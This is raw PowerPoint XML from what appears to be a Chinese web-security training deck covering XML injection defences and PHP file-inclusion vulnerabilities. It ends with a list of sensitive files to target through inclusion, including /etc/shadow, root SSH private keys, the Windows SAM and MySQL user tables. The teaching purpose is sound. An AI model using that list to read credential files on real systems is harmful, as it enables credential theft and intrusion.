            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="745764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下划线部分就是被修改的部分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>其它注入方法详见：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>www.cnblogs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>minisculestep</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/p/5013030.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主要是：依赖于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等地方会</a:t>
            </a:r>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181908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防护方式可以参考一些</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防护：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对用户输入进行一些限制，比如长度、所包含的字符等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对特殊字符进行转码，让用户输入的值不影响原</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30558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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932550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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="526288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程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件， 而无需再次编写，这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用， 但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能，但文件包含漏洞在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中居多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序中却非常少，甚至没有，这是有些语言设计的弊端。 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中经常出现包含漏洞，但这并不意味这其他语言不存在。</a:t>
            </a:r>
          </a:p>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1391636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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686872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远程文件包含漏洞，一般都可以让用户指定文件名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只要可以控制包含的文件来源、路径、名称，就可以利用。</a:t>
            </a:r>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1701783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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098667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参考文档：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>www.cnblogs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/wh4am1/p/6542398.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN"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程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件， 而无需再次编写，这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用， 但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能，但文件包含漏洞在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中居多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序中却非常少，甚至没有，这是有些语言设计的弊端。 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中经常出现包含漏洞，但这并不意味这其他语言不存在。</a:t>
            </a:r>
          </a:p>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990857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kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系统敏感文件有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看系统版本 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>inetsrv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaBase.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置文件 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Windows\repair\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储系统初次安装的密码 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>my.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\data\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>user.MYD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置信息 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C:\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>my.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置信息 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>... </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>id_ras.keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>known_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>my.cnf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
